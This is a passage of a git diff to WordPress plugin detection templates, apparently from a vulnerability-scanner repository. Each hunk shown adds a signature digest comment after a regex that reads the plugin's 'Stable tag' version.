'(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022015d3c1bec64f87266f4c88e8c6956b09a17a70125eaf130dd040fd9a909cfd7a022051929a126f7914bde00aaec0b815df1c18be1a5eed2dc3647d234e3ea168ac7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..752a1e94cc 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009f290b451dcef9f48c2db11cc9cc88ff5a408bf27a6cfbc198bc99726b48d548022100db45bb9f6747a97e0e68af0ed598d0566994abecd17ea51f9ddba95bd048266e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..7f426ce5cb 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206a4fd0e69b63334460aa1d60b80be28db31e7a5f7422fd46da7d6cdd788a5c51022059673d04b2e9e48a666a1cb3a27219d4abb5287cc8faaa33d1eb4840a5cdfa66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index ce5dc03713..2c076bb4bd 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f7b84d551b19e83d8464ffaea3119d32671d7d07e84cc429f910f61ea9a8a25302205946b13a3379687be07dc57cbfa280f3597ebc9577bcf8ad2b539fcdb65a48ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..5df019fd42 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b8486e451bccf1f2837999f1936a7f4bfbfb9925484869ea212a2dd0f5a9c739022100f88c6257af050b2403bc8c1afd89c440045db47d51ac4c456a6ac7759dd3e1a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..a7088fbced 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008b0bbcfeb8887c35069bfbf60f0c0c7ffc5bb7d29fb826826bb4f2623ee6e0f9022100f1202ab5c59139130878e86d9fc7d4986f1c57a3a93a492e61a410423fe3b815:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..f5d474d940 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022025a5569b4b8160891492a66ed7bed5929d484cc9d36300041ffaa2e570e1b2130221008124151b4493f378e088c4929d2e2e3c51d53bd361053e9933933e339510b8ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..ea4d90eab0 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022061d29fc5297612a3bfadc9b5d9234ac1937b44290c30acd0e58c68bb10004c21022100c3feefb059548d7e67bedb6d9616d1273ad8dd258ad4fbc9e4f94e01b6becda8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 45260ccfba..c92d68406b 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210089d4c0be3525e4748a4d0e6662b8fa1ada6dbc32bdb7dc245719c500151a9efe022100a55f5b734e9bf476dbc405c800c651385e50a3167f3a10774bdf1268e0349af6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..c0db2ddd18 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100bef7b3bb8521d8475b7edc933c43a541e870a1845f134abfcbe8d819db7e626c0221009ac53d0183c2068b29050e8e21758903acaa36aefe19adae7dcfe700a58e33fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..aac2a4278c 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206a805e9426683affecd9f4afffd7d237a986d4adb424c9ec86ef2d0e71153c38022100a0d3cbda60f600ecb4b9853a29dd68005174b30b52b02f4e8aadf77aa47f9801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 64cfced6cf..05be16f1c7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022072e02e8082537bfddd35fcd42ce2454ef727e48246e268cda824e99ef0bbe49e022100f4b3d8eaec74f3ce6d6f547353df193308bc4cf612ea3e9ddfcb302b9507b19f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..da52cf9faa 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f2b10a813a06c7be9f018643ff28a0f0db0f45b35d3bf5b8f2502d25890c4e0c022100ef0bf221d203a03b2dfd16e7fb3734444f783f1526a365a5c1553013324907b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..cacf27caee 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201f50f1965b442751fce1b64440089c6ebfc80915ac80af1faaf9c457aa810eb70220062f957152ad0bc19eecb9ac27688bfe23cb68d936af6a8fc6c0bde665d3b47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..ec4d453fb8 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c9c925e279b8b47297d2fcd12c1c24574045294f974320f649411798fe538973022100f4ce5c153cb9455e57a0ace69b3e5984599dc16c8445c03946baf50381ece1c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..70b968c507 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220255c6bb180adbf1d612e85490df68bf373a11d238f246477881cf13965c29321022100ae802516ac4380a2aeed3aa9af2a3251303fc6a2af5fcad0ba72baeeb42b08b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..9e49b568d4 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022024663d7448b62c9e93c1a54ac6934e397a385acda479e9b236857838d668a24d022100950a7345aa0f9f10ef74aa912c825adf0c16dc75f396f093e0666484c2d0bf9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..974a267eab 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009bdd646a8adb268f77e029f97a855ba84bdd3a4d66152a16498f8de665783e0c022043e5de0a6318ee886589122d6d25f8b68e70181e45bf32a3443f606bb8f3b102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..c8da759896 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202975a8b5ace21536f462540330f8c1a8715f0519df0db743dc0e6fc23ab39ffa022100878be5ad82b96e3477fa0c06b87b70ee2c69571fe963cb853da16b2732ceee80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..3df72ff497 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100867dcbcef44d564d1dd391e8fc4352f0c1cfa949064600a090026942c1631098022100f9ab8cada5240efaa018bdea9909fe12d37496ac3aa3ecf325c628abcfe8e0e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..04ede529da 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202de6fce21dfd35994e9ca13b796bc5bdd05dfa57d937be73d5e5a25c55d9d5450220605d38fa9e3602796d49415519e9ce4918dbdde7d929c069c50eb687b41a311a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 4a68323ae1..45bd55e276 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a7cc23f130aa93cfee3131d3ac2f11956ec1e8ed86f050f912979616d056607a022100aab0904480f2a52070912492252fd8b23e447a26993b43aa26bb35be81599a4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..058fa7b1fc 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022068256fb3bacbc87c85af3f19e671ac7af613785bab457b11cb45a2aa9d5cdf38022032d7d0eb187f83418db310e19f917217042bc298b861ee2e9b669d4088cd246a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..c7cf77a21a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220618f7405301d152b2f2bda10d463a6b6d13a79dde79e547421113ff75ab22ab202202b6b65a8f35cfce3b35c5a871b786e7862a0084f00cfd45d05d70dc3ee10978b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..a06e6fc361 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b440b0d9b153a93e5f34e7a9fcf9e3795e07be9afdf00851c9a8c3796765433e022100963c872d3e9920735447f9ab13d3afede07b199825389a4427569d6de3206f2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..a3f51504f3 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f867e5f415c1c5548aee0ef26ee110f3e23470d1303ff4c2780837f7663da45c022100cad48fdc8896ac3b5af13b8893a704d93b9d3d5b60276bd05d68f2dec9201720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..de4b00fe54 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220358e1b716f2b8533732ad362b32ece38053c880b8715428008c8283f1443f2660221009594c2b206be4e71a9e84dd46bfe0d9bcb6b20b65a3118ba27f41ac02a51f4a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..96af508fdc 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206f964b24ee3813b498ec3b707ac1d33f71be336f4906711a31ff21a9de1fa23b0220094339dcdd315ef65215cab9fd3cbc200dbf8bcb1a6beb76dff20c596a6cd849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..a256a95c9a 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100df4ef30de7a2fc8112cc79db020745ef0e4ce572f1994281c1f6a0c5256b61ce022100a2bc028f3e1db32d4ea4451d02eee6b1ea21a5e39cf5d8790417ddf68861bd65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..a3984b7daa 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206a0af2eea78df90f32adeeea23bda24ec9f25695bad02ebb42b57b5f8eea2cb502210092bf9f016ede48dfa85faf59a83e00d5b9a14afda2c096b7bc43bb2c55482f26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..a5c49384ee 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207551b7aeb0032ab6691d0b7cb5ede4e4f9046e2536cb76cb358added74929e7902200cbea5193619557480cff049117643971cf9e54da5e466f34489cce541d12360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..a7068af84a 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ec162d16dc863590cdb9b16067ca3551a1d8d2d345f8f99f6554a547140dd36d022037e01b42dc54d40db76090f30aef890977181fe86d79f7ffc70e114af90bc99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..528c05d599 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220160dd99eea758d8be562da9c9c1639f4617b4ecf5ed6df138e66f05bbb5ec515022024bf53e92dfc9e27e4422cc002b067782c0ee433085baeff9e6c498e6397aa2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..dd5387ff95 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210084897066974d2818798cf31421ddfcdb6fd74e1b5015ac6b5c693d3921bd8f9c022100e7de4c4ab19aa48f622e1093f36d31d56fef9733d2ff3df3b963cd7d3e2e08d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..2a14753c4d 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ae7036ea053485fd9a222d232b4f08dbe57a8e37e96048ead947ca4fb4a55b9f022046630938406716cb0247d936ff673e2f8fd9b57c8be19374e940cd894fa6f723:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..bfe16bfcdc 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b140dcec43f6724c195261b73f593e294f27419961ee9544ff03bf0ca90c4ab102201061f86dab8446f6445aff0346649432339509c4f4ca49da42ede93f45bf14d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..81b3032821 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201937acee156fab4b55c5257ded0d0a852392cfc2d474c5551e7d35f7814924040220068091fd987b776625afc7b374463ee01934eaf4cdecddf30f43d5b42e336f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..13e5dad56f 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207fc1783abb9892284ffc96bcfd504927c5bfe94574ced5ea612f3a442ca1fe98022100ff3a03dcaaf106040c348961cf5e016787a95c927a0101498f61326a29dbfed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index ed3161d27c..a3dd0df51a 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008417a418231424d284554b54bcd3856c81a43473c8bb19da3a3fcbddc95b46ba02205c3f649e06265f38ee436cfb6389bc83907301555dc32b2d56d4c14725fb25bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..9d3a2b48eb 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e6020eafc2029d010212e7aeca0a7b797ab36cf8702d06b655eab7592fed98c80221009943a76d64e4a82ac4a645d40e5a65554de203b7afe71b000158f1cabbee30ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..bb2c79f5cf 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210094e35ac2bde8b6648fb477d51f50efcb5008e128e64c675edeee418b8b95b1b002200683b79d5181a0eb4cf3aacdad140cc8f909a11c668ee68d87b865a4f939a1d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..20e1984830 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200b3e0ce1e2da558a1bc2a1d8cff08aebaf02845b992e9ef4eec73c76dc69ed9f02207af2b7d6679ef6ebf177ab951b920c31ada363ebb94819ce6c192eff118789e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..b6802914c3 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206cb7993465e2cf07fb22466600f44d6862399d6ebaf12ba3f117c127aad8ed6d022077cbbd524fb769eb8dd6af279ce79557fd35e80bb0574a016ae0bcdc7fd97fe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..67e121f2d5 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009205078137fade3ce9f1be78cc3cf4c3b4c2db1ce9013631c6ecb336eaf2d8ef0221009b0f4fc130b69833fa99543d7373c943555dfc24977196879da6936090b15aac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 540d535ecc..039c6a3f5a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207d9d87faeb69cf75f4c79ff5ad9ddb5a1178ceb663a6652908528b2ddeb990a902200cbf3facaa78af373750e9db957c1f4f17570f24123706d4b7e36298cfc141bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..92069bad9d 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220672a9ad21c7d6eb886d8f4290626727279992d3ff91592008fd0eb911d3d33f4022100f30d1ffb2351e4522de92fac3e2e3696b5ef84a4ac4b8d4f043e15d05cb3c456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 48e3bd3fca..564d38c6b8 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202e210f56dda51ef690447b8cdde476c7361797d1dc3e335a71696c54efdf7fd50220721715cf1e94449298a8d7d9ed85581b11f3c9a878de48b8ccc7d61c61188f8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..76937623db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 